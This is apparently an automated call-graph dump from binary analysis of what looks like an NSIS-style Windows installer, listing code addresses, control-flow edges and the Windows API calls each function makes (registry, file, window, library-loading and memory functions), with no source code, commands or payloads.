4355 405b73 GetTickCount GetTempFileNameA 4354->4355 4356 405ba0 4355->4356 4357 405ba4 4355->4357 4356->4355 4356->4357 4357->4352 5100 401947 5101 402acb 17 API calls 5100->5101 5102 40194e lstrlenA 5101->5102 5103 40257d 5102->5103 4367 4025ca 4368 402aa9 17 API calls 4367->4368 4373 4025d4 4368->4373 4369 402642 4371 402644 4378 405efe wsprintfA 4371->4378 4372 402654 4372->4369 4375 40266a SetFilePointer 4372->4375 4373->4369 4373->4371 4373->4372 4376 405bb1 ReadFile 4373->4376 4375->4369 4377 405bcf 4376->4377 4377->4373 4378->4369 5107 40224b 5108 402acb 17 API calls 5107->5108 5109 402251 5108->5109 5110 402acb 17 API calls 5109->5110 5111 40225a 5110->5111 5112 402acb 17 API calls 5111->5112 5113 402263 5112->5113 5114 4062a3 2 API calls 5113->5114 5115 40226c 5114->5115 5116 40227d lstrlenA lstrlenA 5115->5116 5121 402270 5115->5121 5118 4050c7 24 API calls 5116->5118 5117 4050c7 24 API calls 5120 402278 5117->5120 5119 4022b9 SHFileOperationA 5118->5119 5119->5120 5119->5121 5121->5117 5122 4028cb 5123 402aa9 17 API calls 5122->5123 5124 4028d1 5123->5124 5125 4028e3 5124->5125 5126 402906 5124->5126 5127 40271c 5124->5127 5125->5127 5130 405efe wsprintfA 5125->5130 5126->5127 5128 405fc2 17 API calls 5126->5128 5128->5127 5130->5127 5131 4022cd 5132 4022e7 5131->5132 5133 4022d4 5131->5133 5134 405fc2 17 API calls 5133->5134 5135 4022e1 5134->5135 5136 4056bc MessageBoxIndirectA 5135->5136 5136->5132 4872 4020d1 4873 402acb 17 API calls 4872->4873 4874 4020d8 4873->4874 4875 402acb 17 API calls 4874->4875 4876 4020e2 4875->4876 4877 402acb 17 API calls 4876->4877 4878 4020ec 4877->4878 4879 402acb 17 API calls 4878->4879 4880 4020f6 4879->4880 4881 402acb 17 API calls 4880->4881 4882 402100 4881->4882 4883 402142 CoCreateInstance 4882->4883 4884 402acb 17 API calls 4882->4884 4887 402161 4883->4887 4889 40220c 4883->4889 4884->4883 4885 401423 24 API calls 4886 402242 4885->4886 4888 4021ec MultiByteToWideChar 4887->4888 4887->4889 4888->4889 4889->4885 4889->4886 5137 4044d1 5138 4044fd 5137->5138 5139 40450e 5137->5139 5198 4056a0 GetDlgItemTextA 5138->5198 5141 40451a GetDlgItem 5139->5141 5144 404579 5139->5144 5143 40452e 5141->5143 5142 404508 5145 40620a 5 API calls 5142->5145 5147 404542 SetWindowTextA 5143->5147 5152 4059d1 4 API calls 5143->5152 5148 405fc2 17 API calls 5144->5148 5158 40465d 5144->5158 5196 404807 5144->5196 5145->5139 5150 40403f 18 API calls 5147->5150 5153 4045ed SHBrowseForFolderA 5148->5153 5149 40468d 5154 405a26 18 API calls 5149->5154 5155 40455e 5150->5155 5151 4040a6 8 API calls 5156 40481b 5151->5156 5161 404538 5152->5161 5157 404605 CoTaskMemFree 5153->5157 5153->5158 5159 404693 5154->5159 5160 40403f 18 API calls 5155->5160 5163 405938 3 API calls 5157->5163 5158->5196 5200 4056a0 GetDlgItemTextA 5158->5200 5201 405fa0 lstrcpynA 5159->5201 5164 40456c 5160->5164 5161->5147 5162 405938 3 API calls 5161->5162 5162->5147 5165 404612 5163->5165 5199 404074 SendMessageA 5164->5199 5168 404649 SetDlgItemTextA 5165->5168 5173 405fc2 17 API calls 5165->5173 5168->5158 5169 404572 5171 406338 5 API calls 5169->5171 5170 4046aa 5172 406338 5 API calls 5170->5172 5171->5144 5180 4046b1 5172->5180 5174 404631 lstrcmpiA 5173->5174 5174->5168 5177 404642 lstrcatA 5174->5177 5175 4046ed 5202 405fa0 lstrcpynA 5175->5202 5177->5168 5178 4046f4 5179 4059d1 4 API calls 5178->5179 5181 4046fa GetDiskFreeSpaceA 5179->5181 5180->5175 5183 40597f 2 API calls 5180->5183 5185 404745 5180->5185 5184 40471e MulDiv 5181->5184 5181->5185 5183->5180 5184->5185 5186 4047b6 5185->5186 5187 40494d 20 API calls 5185->5187 5188 4047d9 5186->5188 5190 40140b 2 API calls 5186->5190 5189 4047a3 5187->5189 5203 404061 KiUserCallbackDispatcher 5188->5203 5192 4047b8 SetDlgItemTextA 5189->5192 5193 4047a8 5189->5193 5190->5188 5192->5186 5195 404888 20 API calls 5193->5195 5194 4047f5 5194->5196 5204 40442a 5194->5204 5195->5186 5196->5151 5198->5142 5199->5169 5200->5149 5201->5170 5202->5178 5203->5194 5205 404438 5204->5205 5206 40443d SendMessageA 5204->5206 5205->5206 5206->5196 5207 4026d4 5208 4026da 5207->5208 5209 4026de FindNextFileA 5208->5209 5212 4026f0 5208->5212 5210 40272f 5209->5210 5209->5212 5213 405fa0 lstrcpynA 5210->5213 5213->5212 5214 73a31837 5215 73a3185a 5214->5215 5216 73a3188a GlobalFree 5215->5216 5217 73a3189c 5215->5217 5216->5217 5218 73a31266 2 API calls 5217->5218 5219 73a31a1e GlobalFree GlobalFree 5218->5219 4908 4023d6 4909 402acb 17 API calls 4908->4909 4910 4023e8 4909->4910 4911 402acb 17 API calls 4910->4911 4912 4023f2 4911->4912 4925 402b5b 4912->4925 4915 402427 4919 402aa9 17 API calls 4915->4919 4921 402433 4915->4921 4916 40271c 4917 402acb 17 API calls 4918 402420 lstrlenA 4917->4918 4918->4915 4919->4921 4920 402452 RegSetValueExA 4923 402468 RegCloseKey 4920->4923 4921->4920 4922 402f9c 31 API calls 4921->4922 4922->4920 4923->4916 4926 402b76 4925->4926 4929 405e54 4926->4929 4930 405e63 4929->4930 4931 402402 4930->4931 4932 405e6e RegCreateKeyExA 4930->4932 4931->4915 4931->4916 4931->4917 4932->4931 4933 4014d6 4934 402aa9 17 API calls 4933->4934 4935 4014dc Sleep 4934->4935 4937 402957 4935->4937 4938 401759 4939 402acb 17 API calls 4938->4939 4940 401760 4939->4940 4941 401786 4940->4941 4942 40177e 4940->4942 4979 405fa0 lstrcpynA 4941->4979 4978 405fa0 lstrcpynA 4942->4978 4945 401784 4949 40620a 5 API calls 4945->4949 4946 401791 4947 405938 3 API calls 4946->4947 4948 401797 lstrcatA 4947->4948 4948->4945 4956 4017a3 4949->4956 4950 4017e4 4952 405b14 2 API calls 4950->4952 4951 4062a3 2 API calls 4951->4956 4952->4956 4954 4017ba CompareFileTime 4954->4956 4955 40187e 4957 4050c7 24 API calls 4955->4957 4956->4950 4956->4951 4956->4954 4956->4955 4959 405fa0 lstrcpynA 4956->4959 4965 405fc2 17 API calls 4956->4965 4971 4056bc MessageBoxIndirectA 4956->4971 4975 401855 4956->4975 4977 405b39 GetFileAttributesA CreateFileA 4956->4977 4960 401888 4957->4960 4958 4050c7 24 API calls 4976 40186a 4958->4976 4959->4956 4961 402f9c 31 API calls 4960->4961 4962 40189b 4961->4962 4963 4018af SetFileTime 4962->4963 4964 4018c1 FindCloseChangeNotification 4962->4964 4963->4964 4966 4018d2 4964->4966 4964->4976 4965->4956 4967 4018d7 4966->4967 4968 4018ea 4966->4968 4969 405fc2 17 API calls 4967->4969 4970 405fc2 17 API calls 4968->4970 4972 4018df lstrcatA 4969->4972 4973 4018f2 4970->4973 4971->4956 4972->4973 4974 4056bc MessageBoxIndirectA 4973->4974 4974->4976 4975->4958 4975->4976 4977->4956 4978->4945 4979->4946 5220 401659 5221 402acb 17 API calls 5220->5221 5222 40165f 5221->5222 5223 4062a3 2 API calls 5222->5223 5224 401665 5223->5224 5225 401959 5226 402aa9 17 API calls 5225->5226 5227 401960 5226->5227 5228 402aa9 17 API calls 5227->5228 5229 40196d 5228->5229 5230 402acb 17 API calls 5229->5230 5231 401984 lstrlenA 5230->5231 5233 401994 5231->5233 5232 4019d4 5233->5232 5237 405fa0 lstrcpynA 5233->5237 5235 4019c4 5235->5232 5236 4019c9 lstrlenA 5235->5236 5236->5232 5237->5235 5238 401cda 5239 402aa9 17 API calls 5238->5239 5240 401ce0 IsWindow 5239->5240 5241 401a0e 5240->5241 5242 73a31638 5243 73a31667 5242->5243 5244 73a31a98 17 API calls 5243->5244 5245 73a3166e 5244->5245 5246 73a31681 5245->5246 5247 73a31675 5245->5247 5249 73a3168b 5246->5249 5250 73a316a8 5246->5250 5248 73a31266 2 API calls 5247->5248 5253 73a3167f 5248->5253 5254 73a314e2 3 API calls 5249->5254 5251 73a316d2 5250->5251 5252 73a316ae 5250->5252 5256 73a314e2 3 API calls 5251->5256 5255 73a31559 3 API calls 5252->5255 5257 73a31690 5254->5257 5258 73a316b3 5255->5258 5256->5253 5259 73a31559 3 API calls 5257->5259 5260 73a31266 2 API calls 5258->5260 5261 73a31696 5259->5261 5262 73a316b9 GlobalFree 5260->5262 5263 73a31266 2 API calls 5261->5263 5262->5253 5265 73a316cd GlobalFree 5262->5265 5264 73a3169c GlobalFree 5263->5264 5264->5253 5265->5253 5266 401a5e 5267 402aa9 17 API calls 5266->5267 5268 401a67 5267->5268 5269 402aa9 17 API calls 5268->5269 5270 401a0e 5269->5270 5271 73a3103d 5274 73a3101b 5271->5274 5281 73a314bb 5274->5281 5276 73a31020 5277 73a31027 GlobalAlloc 5276->5277 5278 73a31024 5276->5278 5277->5278 5279 73a314e2 3 API calls 5278->5279 5280 73a3103b 5279->5280 5282 73a314c1 5281->5282 5283 73a314c7 5282->5283 5284 73a314d3 GlobalFree 5282->5284 5283->5276 5284->5276 5285 401f61 5286 402acb 17 API calls 5285->5286 5287 401f68 5286->5287 5288 406338 5 API calls 5287->5288 5289 401f77 5288->5289 5290 401ff7 5289->5290 5291 401f8f GlobalAlloc 5289->5291 5291->5290 5292 401fa3 5291->5292 5293 406338 5 API calls 5292->5293 5294 401faa 5293->5294 5295 406338 5 API calls 5294->5295 5296 401fb4 5295->5296 5296->5290 5300 405efe wsprintfA 5296->5300 5298 401feb 5301 405efe wsprintfA 5298->5301 5300->5298 5301->5290 5302 402561 5303 402acb 17 API calls 5302->5303 5304 402568 5303->5304 5307 405b39 GetFileAttributesA CreateFileA 5304->5307 5306 402574 5307->5306 5308 401563 5309 4028ff 5308->5309 5312 405efe wsprintfA 5309->5312 5311 402904 5312->5311 5313 401b63 5314 401bb4 5313->5314 5319 401b70 5313->5319 5315 401bb8 5314->5315 5316 401bdd GlobalAlloc 5314->5316 5328 4022e7 5315->5328 5334 405fa0 lstrcpynA 5315->5334 5317 405fc2 17 API calls 5316->5317 5321 401bf8 5317->5321 5318 405fc2 17 API calls 5322 4022e1 5318->5322 5319->5321 5323 401b87 5319->5323 5321->5318 5321->5328 5326 4056bc MessageBoxIndirectA 5322->5326 5332 405fa0 lstrcpynA 5323->5332 5325 401bca GlobalFree 5325->5328 5326->5328 5327 401b96 5333 405fa0 lstrcpynA 5327->5333 5330 401ba5 5335 405fa0 lstrcpynA 5330->5335 5332->5327 5333->5330 5334->5325 5335->5328 5336 73a31000 5337 73a3101b 5 API calls 5336->5337 5338 73a31019 5337->5338 4251 4024e5 4252 402b0b 17 API calls 4251->4252 4253 4024ef 4252->4253 4262 402aa9 4253->4262 4255 4024f8 4256 402513 RegEnumKeyA 4255->4256 4257 40251f RegEnumValueA 4255->4257 4260 40271c 4255->4260 4258 40253b RegCloseKey 4256->4258 4257->4258 4259 402534 4257->4259 4258->4260 4259->4258 4263 405fc2 17 API calls 4262->4263 4264 402abe 4263->4264 4264->4255 5339 40166a 5340 402acb 17 API calls 5339->5340 5341 401671 5340->5341 5342 402acb 17 API calls 5341->5342 5343 40167a 5342->5343 5344 402acb 17 API calls 5343->5344 5345 401683 MoveFileA 5344->5345 5346 401696 5345->5346 5347 40168f 5345->5347 5348 4062a3 2 API calls 5346->5348 5351 402242 5346->5351 5349 401423 24 API calls 5347->5349 5350 4016a5 5348->5350 5349->5351 5350->5351 5352 405d7f 36 API calls 5350->5352 5352->5347 4379 403b6b 4380 403b83 4379->4380 4381 403cbe 4379->4381 4380->4381 4382 403b8f 4380->4382 4383 403d0f 4381->4383 4384 403ccf GetDlgItem GetDlgItem 4381->4384 4385 403b9a SetWindowPos 4382->4385 4386 403bad 4382->4386 4388 403d69 4383->4388 4396 401389 2 API calls 4383->4396 4387 40403f 18 API calls 4384->4387 4385->4386 4390 403bb2 ShowWindow 4386->4390 4391 403bca 4386->4391 4392 403cf9 SetClassLongA 4387->4392 4389 40408b SendMessageA 4388->4389 4409 403cb9 4388->4409 4423 403d7b 4389->4423 4390->4391 4393 403bd2 DestroyWindow 4391->4393 4394 403bec 4391->4394 4395 40140b 2 API calls 4392->4395 4449 403fc8 4393->4449 4397 403bf1 SetWindowLongA 4394->4397 4398 403c02 4394->4398 4395->4383 4399 403d41 4396->4399 4397->4409 4402 403cab 4398->4402 4403 403c0e GetDlgItem 4398->4403 4399->4388 4404 403d45 SendMessageA 4399->4404 4400 40140b 2 API calls 4400->4423 4401 403fca DestroyWindow EndDialog 4401->4449 4405 4040a6 8 API calls 4402->4405 4407 403c21 SendMessageA IsWindowEnabled 4403->4407 4408 403c3e 4403->4408 4404->4409 4405->4409 4406 403ff9 ShowWindow 4406->4409 4407->4408 4407->4409 4411 403c4b 4408->4411 4412 403c92 SendMessageA 4408->4412 4413 403c5e 4408->4413 4421 403c43 4408->4421 4410 405fc2 17 API calls 4410->4423 4411->4412 4411->4421 4412->4402 4415 403c66 4413->4415 4416 403c7b 4413->4416 4414 404018 SendMessageA 4417 403c79 4414->4417 4456 40140b 4415->4456 4419 40140b 2 API calls 4416->4419 4417->4402 4422 403c82 4419->4422 4420 40403f 18 API calls 4420->4423 4421->4414 4422->4402 4422->4421 4423->4400 4423->4401 4423->4409 4423->4410 4423->4420 4424 40403f 18 API calls 4423->4424 4440 403f0a DestroyWindow 4423->4440 4425 403df6 GetDlgItem 4424->4425 4426 403e13 ShowWindow KiUserCallbackDispatcher 4425->4426 4427 403e0b 4425->4427 4450 404061 KiUserCallbackDispatcher 4426->4450 4427->4426 4429 403e3d EnableWindow 4434 403e51 4429->4434 4430 403e56 GetSystemMenu EnableMenuItem SendMessageA 4431 403e86 SendMessageA 4430->4431 4430->4434 4431->4434 4434->4430 4451 404074 SendMessageA 4434->4451 4452 403b4c 4434->4452 4455 405fa0 lstrcpynA 4434->4455 4436 403eb5 lstrlenA 4437 405fc2 17 API calls 4436->4437 4438 403ec6 SetWindowTextA 4437->4438 4439 401389 2 API calls 4438->4439 4439->4423 4441 403f24 CreateDialogParamA 4440->4441 4440->4449 4442 403f57 4441->4442 4441->4449 4443 40403f 18 API calls 4442->4443 4444 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4443->4444 4445 401389 2 API calls 4444->4445 4446 403fa8 4445->4446 4446->4409 4447 403fb0 ShowWindow 4446->4447 4448 40408b SendMessageA 4447->4448 4448->4449 4449->4406 4449->4409 4450->4429 4451->4434 4453 405fc2 17 API calls 4452->4453 4454 403b5a SetWindowTextA 4453->4454 4454->4434 4455->4436 4457 401389 2 API calls 4456->4457 4458 401420 4457->4458 4458->4421 5353 4019ed 5354 402acb 17 API calls 5353->5354 5355 4019f4 5354->5355 5356 402acb 17 API calls 5355->5356 5357 4019fd 5356->5357 5358 401a04 lstrcmpiA 5357->5358 5359 401a16 lstrcmpA 5357->5359 5360 401a0a 5358->5360 5359->5360 4867 40156f 4868 401586 4867->4868 4869 40157f ShowWindow 4867->4869 4870 401594 ShowWindow 4868->4870 4871 402957 4868->4871 4869->4868 4870->4871 4896 402473 4897 402b0b 17 API calls 4896->4897 4898 40247d 4897->4898 4899 402acb 17 API calls 4898->4899 4900 402486 4899->4900 4901 402490 RegQueryValueExA 4900->4901 4902 40271c 4900->4902 4903 4024b6 RegCloseKey 4901->4903 4904 4024b0 4901->4904 4903->4902 4904->4903 4907 405efe wsprintfA 4904->4907 4907->4903 5361 4014f4 SetForegroundWindow 5362 402957 5361->5362 5363 404175 lstrcpynA lstrlenA 5364 73a32015 5365 73a3201b 5364->5365 5366 73a32055 lstrcpyA 5365->5366 5389 73a31ad9 5365->5389 5366->5389 5367 73a31cde GlobalFree GlobalFree GlobalFree 5368 73a31cfb 5367->5368 5383 73a31d45 5367->5383 5369 73a320b1 5368->5369 5374 73a31d10 5368->5374 5368->5383 5370 73a320d3 GetModuleHandleA 5369->5370 5369->5383 5371 73a320e4 LoadLibraryA 5370->5371 5372 73a320f9 5370->5372 5371->5372 5371->5383 5395 73a315c2 GetProcAddress 5372->5395 5379 73a31224 2 API calls 5374->5379 5374->5383 5375 73a31b9b GlobalAlloc 5375->5389 5376 73a3214a 5381 73a32157 lstrlenA 5376->5381 5376->5383 5377 73a31be6 lstrcpyA 5380 73a31bf0 lstrcpyA 5377->5380 5378 73a31c04 GlobalFree 5378->5389 5379->5383 5380->5389 5396 73a315c2 GetProcAddress 5381->5396 5382 73a3210b 5382->5376 5387 73a32134 GetProcAddress 5382->5387 5385 73a31f95 5394 73a31215 GlobalAlloc 5385->5394 5386 73a31e2f 5387->5376 5389->5367 5389->5375 5389->5377 5389->5378 5389->5380 5389->5385 5389->5386 5390 73a31ed7 GlobalFree 5389->5390 5391 73a31224 2 API calls 5389->5391 5392 73a31534 2 API calls 5389->5392 5390->5389 5391->5389 5392->5389 5393 73a31f9d 5394->5393 5395->5382 5396->5383 5397 73a3221a 5398 73a32284 5397->5398 5399 73a3228f GlobalAlloc 5398->5399 5400 73a322ae 5398->5400 5399->5398 5401 401cfb 5402 402aa9 17 API calls 5401->5402 5403 401d02 5402->5403 5404 402aa9 17 API calls 5403->5404 5405 401d0e GetDlgItem 5404->5405 5406 40257d 5405->5406 5000 4022fc 5001 402304 5000->5001 5002 40230a 5000->5002 5003 402acb 17 API calls 5001->5003 5004 40231a 5002->5004 5005 402acb 17 API calls 5002->5005 5003->5002 5006 402acb 17 API calls 5004->5006 5008 402328 5004->5008 5005->5004 5006->5008 5007 402acb 17 API calls 5009 402331 WritePrivateProfileStringA 5007->5009 5008->5007 5407 402c7c 5408 402c8b SetTimer 5407->5408 5410 402ca4 5407->5410 5408->5410 5409 402cf9 5410->5409 5411 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5410->5411 5411->5409 5412 4018fd 5413 401934 5412->5413 5414 402acb 17 API calls 5413->5414 5415 401939 5414->5415 5416 405768 67 API calls 5415->5416 5417 401942 5416->5417 5418 4026fe 5419 402acb 17 API calls 5418->5419 5420 402705 FindFirstFileA 5419->5420 5421 402728 5420->5421 5424 402718 5420->5424 5422 40272f 5421->5422 5426 405efe wsprintfA 5421->5426 5427 405fa0 lstrcpynA 5422->5427 5426->5422 5427->5424 5428 401000 5429 401037 BeginPaint GetClientRect 5428->5429 5430 40100c DefWindowProcA 5428->5430 5431 4010f3 5429->5431 5433 401179 5430->5433 5434 401073 CreateBrushIndirect FillRect DeleteObject 5431->5434 5435 4010fc 5431->5435 5434->5431 5436 401102 CreateFontIndirectA 5435->5436 5437 401167 EndPaint 5435->5437 5436->5437 5438 401112 6 API calls 5436->5438 5437->5433 5438->5437 5439 401900 5440 402acb 17 API calls 5439->5440 5441 401907 5440->5441 5442 4056bc MessageBoxIndirectA 5441->5442 5443 401910 5442->5443 4008 402381 4009 4023b3 4008->4009 4010 402388 4008->4010 4012 402acb 17 API calls 4009->4012 4020 402b0b 4010->4020 4014 4023ba 4012->4014 4025 402b89 4014->4025 4015 402399 4017 402acb 17 API calls 4015->4017 4019 4023a0 RegDeleteValueA RegCloseKey 4017->4019 4018 4023c7 4019->4018 4021 402acb 17 API calls 4020->4021 4022 402b22 4021->4022 4023 405e26 RegOpenKeyExA 4022->4023 4024 40238f 4023->4024 4024->4015 4024->4018 4026 402b95 4025->4026 4027 402b9c 4025->4027 4026->4018 4027->4026 4029 402bcd 4027->4029 4030 405e26 RegOpenKeyExA 4029->4030 4031 402bfb 4030->4031 4032 402c75 4031->4032 4037 402bff 4031->4037 4032->4026 4033 402c21 RegEnumKeyA 4034 402c38 RegCloseKey 4033->4034 4033->4037 4042 406338 GetModuleHandleA 4034->4042 4036 402c59 RegCloseKey 4036->4032 4037->4033 4037->4034 4037->4036 4039 402bcd 6 API calls 4037->4039 4039->4037 4040 402c69 RegDeleteKeyA 4040->4032 4041 402c4c 4041->4032 4043 406354 4042->4043 4044 40635e GetProcAddress 4042->4044 4048 4062ca GetSystemDirectoryA 4043->4048 4046 402c48 4044->4046 4046->4040 4046->4041 4047 40635a 4047->4044 4047->4046 4049 4062ec wsprintfA LoadLibraryExA 4048->4049 4049->4047 4051 73a328e1 4052 73a32931 4051->4052 4053 73a328f1 VirtualProtect 4051->4053 4053->4052 5444 401502 5445 40150a 5444->5445 5447 40151d 5444->5447 5446 402aa9 17 API calls 5445->5446 5446->5447 4054 402003 4055 402015 4054->4055 4056 4020c3 4054->4056 4057 402acb 17 API calls 4055->4057 4059 401423 24 API calls 4056->4059 4058 40201c 4057->4058 4060 402acb 17 API calls 4058->4060 4065 402242 4059->4065 4061 402025 4060->4061 4062 40203a LoadLibraryExA 4061->4062 4063 40202d GetModuleHandleA 4061->4063 4062->4056 4064 40204a GetProcAddress 4062->4064 4063->4062 4063->4064 4066 402096 4064->4066 4067 402059 4064->4067 4120 4050c7 4066->4120 4068 402061 4067->4068 4069 402078 4067->4069 4117 401423 4068->4117 4075 73a316db 4069->4075 4072 402069 4072->4065 4073 4020b7 FreeLibrary 4072->4073 4073->4065 4076 73a3170b 4075->4076 4131 73a31a98 4076->4131 4078 73a31712 4079 73a31834 4078->4079 4080 73a31723 4078->4080 4081 73a3172a 4078->4081 4079->4072 4178 73a3226f 4080->4178 4162 73a322b1 4081->4162 4086 73a3174f 4087 73a31770 4086->4087 4088 73a3178e 4086->4088 4191 73a32498 4087->4191 4093 73a31794 4088->4093 4094 73a317dc 4088->4094 4089 73a31740 4092 73a31746 4089->4092 4098 73a31751 4089->4098 4090 73a31759 4090->4086 4188 73a32c83 4090->4188 4092->4086 4172 73a329f8 4092->4172 4210 73a3156b 4093->4210 4096 73a32498 11 API calls 4094->4096 4105 73a317cd 4096->4105 4097 73a31776 4202 73a31559 4097->4202 4182 73a32672 4098->4182 4104 73a32498 11 API calls 4104->4105 4108 73a31823 4105->4108 4216 73a3245e 4105->4216 4107 73a31757 4107->4086 4108->4079 4110 73a3182d GlobalFree 4108->4110 4110->4079 4114 73a3180f 4114->4108 4220 73a314e2 wsprintfA 4114->4220 4115 73a31808 FreeLibrary 4115->4114 4118 4050c7 24 API calls 4117->4118 4119 401431 4118->4119 4119->4072 4121 4050e2 4120->4121 4130 405185 4120->4130 4122 4050ff lstrlenA 4121->4122 4123 405fc2 17 API calls 4121->4123 4124 405128 4122->4124 4125 40510d lstrlenA 4122->4125 4123->4122 4127 40513b 4124->4127 4128 40512e SetWindowTextA 4124->4128 4126 40511f lstrcatA 4125->4126 4125->4130 4126->4124 4129 405141 SendMessageA SendMessageA SendMessageA 4127->4129 4127->4130 4128->4127 4129->4130 4130->4072 4223 73a31215 GlobalAlloc 4131->4223 4133 73a31abc 4224 73a31215 GlobalAlloc 4133->4224 4135 73a31ac7 4136 73a31cde GlobalFree GlobalFree GlobalFree 4135->4136 4140 73a31b9b GlobalAlloc 4135->4140 4144 73a31be6 lstrcpyA 4135->4144 4145 73a31c04 GlobalFree 4135->4145 4147 73a31bf0 lstrcpyA 4135->4147 4151 73a31f95 4135->4151 4152 73a31e2f 4135->4152 4157 73a31ed7 GlobalFree 4135->4157 4158 73a31224 2 API calls 4135->4158 4225 73a31534 GlobalSize GlobalAlloc 4135->4225 4137 73a31cfb 4136->4137 4155 73a31d45 4136->4155 4138 73a320b1 4137->4138 4139 73a31d10 4137->4139 4137->4155 4141 73a320d3 GetModuleHandleA 4138->4141 4138->4155 4139->4155 4227 73a31224 4139->4227 4140->4135 4142 73a320e4 LoadLibraryA 4141->4142 4143 73a320f9 4141->4143 4142->4143 4142->4155 4231 73a315c2 GetProcAddress 4143->4231 4144->4147 4145->4135 4147->4135 4148 73a3214a 4149 73a32157 lstrlenA 4148->4149 4148->4155 4232 73a315c2 GetProcAddress 4149->4232 4230 73a31215 GlobalAlloc 4151->4230 4152->4078 4153 73a3210b 4153->4148 4160 73a32134 GetProcAddress 4153->4160 4155->4078 4157->4135 4158->4135 4160->4148 4161 73a31f9d 4161->4078 4163 73a322ca 4162->4163 4165 73a32406 GlobalFree 4163->4165 4166 73a32378 GlobalAlloc MultiByteToWideChar 4163->4166 4168 73a31224 GlobalAlloc lstrcpynA 4163->4168 4169 73a323c5 4163->4169 4234 73a312ad 4163->4234 4165->4163 4167 73a31730 4165->4167 4166->4169 4170 73a323a4 GlobalAlloc CLSIDFromString GlobalFree 4166->4170 4167->4086 4167->4089 4167->4090 4168->4163 4169->4165 4238 73a32606 4169->4238 4170->4165 4174 73a32a0a 4172->4174 4173 73a32aaf CreateFileA 4177 73a32acd 4173->4177 4174->4173 4176 73a32b99 4176->4086 4241 73a329a4 4177->4241 4179 73a32284 4178->4179 4180 73a3228f GlobalAlloc 4179->4180 4181 73a31729 4179->4181 4180->4179 4181->4081 4186 73a326a2 4182->4186 4183 73a32750 4185 73a32756 GlobalSize 4183->4185 4187 73a32760 4183->4187 4184 73a3273d GlobalAlloc 4184->4187 4185->4187 4186->4183 4186->4184 4187->4107 4189 73a32c8e 4188->4189 4190 73a32cce GlobalFree 4189->4190 4245 73a31215 GlobalAlloc 4191->4245 4193 73a32523 lstrcpynA 4199 73a324a4 4193->4199 4194 73a32534 StringFromGUID2 WideCharToMultiByte 4194->4199 4195 73a32558 WideCharToMultiByte 4195->4199 4196 73a32579 wsprintfA 4196->4199 4197 73a3259d GlobalFree 4197->4199 4198 73a325d7 GlobalFree 4198->4097 4199->4193 4199->4194 4199->4195 4199->4196 4199->4197 4199->4198 4200 73a31266 2 API calls 4199->4200 4246 73a312d1 4199->4246 4200->4199 4250 73a31215 GlobalAlloc 4202->4250 4204 73a3155e 4205 73a3156b 2 API calls 4204->4205 4206 73a31568 4205->4206 4207 73a31266 4206->4207 4208 73a312a8 GlobalFree 4207->4208 4209 73a3126f GlobalAlloc lstrcpynA 4207->4209 4208->4105 4209->4208 4211 73a315a4 lstrcpyA 4210->4211 4212 73a31577 wsprintfA 4210->4212 4215 73a315bd 4211->4215 4212->4215 4215->4104 4217 73a317ef 4216->4217 4218 73a3246c 4216->4218 4217->4114 4217->4115 4218->4217 4219 73a32485 GlobalFree 4218->4219 4219->4218 4221 73a31266 2 API calls 4220->4221 4222 73a31503 4221->4222 4222->4108 4223->4133 4224->4135 4226 73a31552 4225->4226 4226->4135 4233 73a31215 GlobalAlloc 4227->4233 4229 73a31233 lstrcpynA 4229->4155 4230->4161 4231->4153 4232->4155 4233->4229 4235 73a312b4 4234->4235 4236 73a31224 2 API calls 4235->4236 4237 73a312cf 4236->4237 4237->4163 4239 73a32614 VirtualAlloc 4238->4239 4240 73a3266a 4238->4240 4239->4240 4240->4169 4242 73a329af 4241->4242 4243 73a329b4 GetLastError 4242->4243 4244 73a329bf 4242->4244 4243->4244 4244->4176 4245->4199 4247 73a312da 4246->4247 4248 73a312f9 4246->4248 4247->4248 4249 73a312e0 lstrcpyA 4247->4249 4248->4199 4249->4248 4250->4204 5448 73a310e0 5451 73a3110e 5448->5451 5449 73a311c4 GlobalFree 5450 73a312ad 2 API calls 5450->5451 5451->5449 5451->5450 5452 73a311c3 5451->5452 5453 73a311ea GlobalFree 5451->5453 5454 73a31266 2 API calls 5451->5454 5455 73a31155 GlobalAlloc 5451->5455 5456 73a312d1 lstrcpyA 5451->5456 5457 73a311b1 GlobalFree 5451->5457 5452->5449 5453->5451 5454->5457 5455->5451 5456->5451 5457->5451 5458 402583 5459 402588 5458->5459 5460 40259c 5458->5460 5462 402aa9 17 API calls 5459->5462 5461 402acb 17 API calls 5460->5461 5463 4025a3 lstrlenA 5461->5463 5464 402591 5462->5464 5463->5464 5465 4025c5 5464->5465 5466 405be0 WriteFile 5464->5466 5466->5465 4265 405205 4266 4053b0 4265->4266 4267 405227 GetDlgItem GetDlgItem GetDlgItem 4265->4267 4269 4053e0 4266->4269 4270 4053b8 GetDlgItem CreateThread FindCloseChangeNotification 4266->4270 4311 404074 SendMessageA 4267->4311 4272 40540e 4269->4272 4275 4053f6 ShowWindow ShowWindow 4269->4275 4276 40542f 4269->4276 4270->4269 4334 405199 OleInitialize 4270->4334 4271 405297 4280 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 4271->4280 4273 405416 4272->4273 4274 405469 4272->4274 4277 405442 ShowWindow 4273->4277 4278 40541e 4273->4278 4274->4276 4287 405476 SendMessageA 4274->4287 4316 404074 SendMessageA 4275->4316 4320 4040a6 4276->4320 4283 405462 4277->4283 4284 405454 4277->4284 4317 404018 4278->4317 4285 4052f0 SendMessageA SendMessageA 4280->4285 4286 40530c 4280->4286 4289 404018 SendMessageA 4283->4289 4288 4050c7 24 API calls 4284->4288 4285->4286 4290 405311 SendMessageA 4286->4290 4291 40531f 4286->4291 4292 40543b 4287->4292 4293 40548f CreatePopupMenu 4287->4293 4288->4283 4289->4274 4290->4291 4312 40403f 4291->4312 4295 405fc2 17 API calls 4293->4295 4296 40549f AppendMenuA 4295->4296 4298 4054d0 TrackPopupMenu 4296->4298 4299 4054bd GetWindowRect 4296->4299 4297 40532f 4300 405338 ShowWindow 4297->4300 4301 40536c GetDlgItem SendMessageA 4297->4301 4298->4292 4302 4054ec 4298->4302 4299->4298 4303 40535b 4300->4303 4304 40534e ShowWindow 4300->4304 4301->4292 4305 405393 SendMessageA SendMessageA 4301->4305 4306 40550b SendMessageA 4302->4306 4315 404074 SendMessageA 4303->4315 4304->4303 4305->4292 4306->4306 4307 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4306->4307 4309 40554a SendMessageA 4307->4309 4309->4309 4310 40556c GlobalUnlock SetClipboardData CloseClipboard 4309->4310 4310->4292 4311->4271 